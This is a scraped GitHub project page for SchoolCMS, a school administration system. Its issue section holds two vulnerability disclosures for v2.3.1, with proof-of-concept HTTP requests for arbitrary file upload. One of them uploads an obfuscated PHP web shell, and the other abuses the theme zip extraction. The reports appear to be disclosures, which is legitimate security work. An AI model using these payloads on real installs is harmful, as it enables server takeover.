gongfuxiang / schoolcms Goto Github PK
View Code? Open in Web Editor NEW**首个开源学校教务管理系统、网站布局自动化、学生/成绩/教师、成绩查询
License: Apache License 2.0
schoolcms's People
Contributors
Stargazers
Watchers
Forkers
baitongda mojieshun wuliangqiu clrsdream dewey363 fashtimedotcom zh-yu diycp hanyeliu csliangdu phplulu d5d cnbillow bochaoding datacabbage sky8652 corner4world adymilk xiahui1986 lianix wanddy vividoner myxzjie leeeric9527 zy1232002 shiliuxing dragonlhp siscool ts295983632 robbbit vitooi vokie123456 haxine 365-w windzzp muqiudashen fengzi12 zen-li lzpfmh yuexueyu fandways wljun1128 stevenpan110 cawa0505 wanxh itd2008 5665750 xuchaoyang axchgit iharry007 kmokid wangyang5551051 awesome-wolf landlordlycat happylee1991 323111060 syj3000511 xutangle myedunote bull-rider adteven andyshao kunsanw sanshao27 larkdoc alec185 qming96 13121075883 jameswig zillachan l-yanjun 18595476026 weiplanet namesu ethan2018 yupengfei8421 michealcheng vinuamazin moodykeke lltxwdk jamesyu89 smallant comfortableasd literaryprogrammer laozhou0731 shuimoliunianai 29056 starsw001 18037128621 liangleost wahson-gong liangdabiao gyzrich love0205 wangxuanyeah qy042159 codinglist weizx208 yujiannan zjliang95schoolcms's Issues
演示地址怎么404了
SchoolCMS v2.3.1has a file upload vulnerability
Detail:
Http:
POST /admin.php?m=Admin&c=Site&a=Save HTTP/1.1
Host: schoolcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------20557339626727
Content-Length: 2437
Origin: http://schoolcms.com
Connection: close
Referer: http://schoolcms.com/admin.php?m=Admin&c=Site&a=Index
Cookie: PHPSESSID=7hb5r5vqt11i3m5l3hojh68rf2; think_language=zh-CN
-----------------------------20557339626727
Content-Disposition: form-data; name="max_file_size"
2047997
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_name"
SchoolCMS
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_logo_img"; filename="test.php"
Content-Type: text/php
<?php
$shang='tpY<$*'^"\x15\x3\x2a\x59\x56\x5e";
@$shang($_GET['a']);
?>
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_logo"
/Public/Upload/Home/image/home_logo.php
-----------------------------20557339626727
Content-Disposition: form-data; name=""
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_image"
2047997
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_file"
51200000
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_video"
102400000
-----------------------------20557339626727
Content-Disposition: form-data; name="home_content_max_width"
1200
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_close_reason"
å��级ä¸...
-----------------------------20557339626727
Content-Disposition: form-data; name=""
-----------------------------20557339626727
Content-Disposition: form-data; name="common_verify_expire_time"
600
-----------------------------20557339626727
Content-Disposition: form-data; name="common_verify_time_interval"
30
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_icp"
1111
-----------------------------20557339626727
Content-Disposition: form-data; name="home_footer_info"
111
-----------------------------20557339626727
Content-Disposition: form-data; name="common_timezone"
Asia/Shanghai
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_state"
1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_user_login_state"
1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_img_verify_state"
1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_user_reg_state"
sms,email
-----------------------------20557339626727--
code: WWW\schoolcms\Application\Admin\Controller\SiteController.class.php
public function Save()
{
// 站点logo
if(isset($_FILES['home_site_logo_img']['error']))
{
// 文件上传校验
$error = FileUploadError('home_site_logo_img');
if($error !== true)
{
$this->ajaxReturn($error, -1);
}
// 文件类型
list($type, $suffix) = explode('/', $_FILES['home_site_logo_img']['type']);
$path = 'Public/Upload/Home/image/';
if(!is_dir($path))
{
mkdir(ROOT_PATH.$path, 0777, true);
}
$filename = 'home_logo.'.$suffix;
$home_site_logo = $path.$filename;
if(move_uploaded_file($_FILES['home_site_logo_img']['tmp_name'], ROOT_PATH.$home_site_logo))
{
$_POST['home_site_logo'] = '/'.$home_site_logo;
}
}
// 站点状态值处理
if(!isset($_POST['home_user_reg_state']))
{
$_POST['home_user_reg_state'] = '';
}
// 基础配置
$this->MyConfigSave();
}
}
?>
如何关闭安全设置
There is two xss vulnerability
SchoolCMS v2.3.1 file upload and unzip vulnerability
SchoolCMS v2.3.1 file upload and unzip vulnerability
Detail:
POST /schoolcms/admin.php?m=admin&c=theme&a=upload HTTP/1.1
Host: 127.0.0.1
Content-Length: 502
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzvqqC1ZAHhAnw74R
Referer: http://127.0.0.1/schoolcms/admin.php?m=admin&c=theme&a=index&view_type=upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tiamjbmuiknb087jko5umifkq0; think_language=zh-CN
Connection: close
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="max_file_size"
51200000
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="theme"; filename="test_Static.zip"
Content-Type: application/x-zip-compressed
���c=theme -> Controller=theme, a=upload -> action=upload. /schoolcms/Application/Admin/Controller/ThemeController.class.php Line 180:
public function Upload()
{
// 是否ajax
if(!IS_AJAX)
{
$this->error(L('common_unauthorized_access'));
}
// 文件上传校验
$error = FileUploadError('theme');
if($error !== true)
{
$this->ajaxReturn($error, -1);
}
// 文件格式化校验
$type = array('application/zip', 'application/octet-stream');
if(!in_array($_FILES['theme']['type'], $type))
{
$this->ajaxReturn(L('theme_upload_error'), -2);
}
// 开始解压文件
$resource = zip_open($_FILES['theme']['tmp_name']);
while(($temp_resource = zip_read($resource)) !== false)
{
if(zip_entry_open($resource, $temp_resource))
{
// 当前压缩包中项目名称
$file = zip_entry_name($temp_resource);
// 排除临时文件和临时目录
if(strpos($file, '/.') === false && strpos($file, '__') === false)
{
// 拼接路径
if(strpos($file, '_Html') !== false)
{
$file = $this->html_path.$file;
} else if(strpos($file, '_Static') !== false)
{
$file = $this->static_path.$file;
} else {
continue;
}
$file = str_replace(array('_Static/', '_Html/'), '', $file);
// 截取文件路径
$file_path = substr($file, 0, strrpos($file, '/'));
// 路径不存在则创建
if(!is_dir($file_path))
{
mkdir($file_path, 0777, true);
}
// 如果不是目录则写入文件
if(!is_dir($file))
{
// 读取这个文件
$file_size = zip_entry_filesize($temp_resource);
$file_content = zip_entry_read($temp_resource, $file_size);
file_put_contents($file, $file_content);
}
// 关闭目录项
zip_entry_close($temp_resource);
}
}
}
$this->ajaxReturn(L('common_operation_success'));
}
}check Content-Type, default is "application/x-zip-compressed", not in array
// 文件格式化校验
$type = array('application/zip', 'application/octet-stream');
if(!in_array($_FILES['theme']['type'], $type))
{
$this->ajaxReturn(L('theme_upload_error'), -2);
}unzip, check filename, if filename does not contain "_Html" or "_Static" , it will Jump to the next loop.
while(($temp_resource = zip_read($resource)) !== false)
{
if(zip_entry_open($resource, $temp_resource))
{
// 当前压缩包中项目名称
$file = zip_entry_name($temp_resource);
// 排除临时文件和临时目录
if(strpos($file, '/.') === false && strpos($file, '__') === false)
{
// 拼接路径
if(strpos($file, '_Html') !== false)
{
$file = $this->html_path.$file;
} else if(strpos($file, '_Static') !== false)
{
$file = $this->static_path.$file;
} else {
continue;
}html_path,static_path: Line 14
private $html_path;
private $static_path;
/**
* [_initialize 前置操作-继承公共前置方法]
* @author Devil
* @blog http://gong.gg/
* @version 0.0.1
* @datetime 2016-12-03T12:39:08+0800
*/
public function _initialize()
{
// 调用父类前置方法
parent::_initialize();
// 登录校验
$this->Is_Login();
// 权限校验
$this->Is_Power();
// 静态目录和html目录
$this->html_path = 'Application'.DS.'Home'.DS.'View'.DS;
$this->static_path = 'Public'.DS.'Home'.DS;
}DS: /schoolcms/core.php Line 47
/* 定义系统目录分隔符 */
define('DS', DIRECTORY_SEPARATOR);static_path = '\Public\Home\'
write to file
$file_size = zip_entry_filesize($temp_resource);
$file_content = zip_entry_read($temp_resource, $file_size);
file_put_contents($file, $file_content);POC:
set Content-Type=application/zip and filename=test_Static.php
POST /schoolcms/admin.php?m=admin&c=theme&a=upload HTTP/1.1
Host: 127.0.0.1
Content-Length: 489
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzvqqC1ZAHhAnw74R
Referer: http://127.0.0.1/schoolcms/admin.php?m=admin&c=theme&a=index&view_type=upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tiamjbmuiknb087jko5umifkq0; think_language=zh-CN
Connection: close
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="max_file_size"
51200000
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="theme"; filename="test_Static.zip"
Content-Type: application/zip
���upload success:
php7问题
你好,请问在php7下总是安装提示连接数据库失败,这是什么情况呢
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.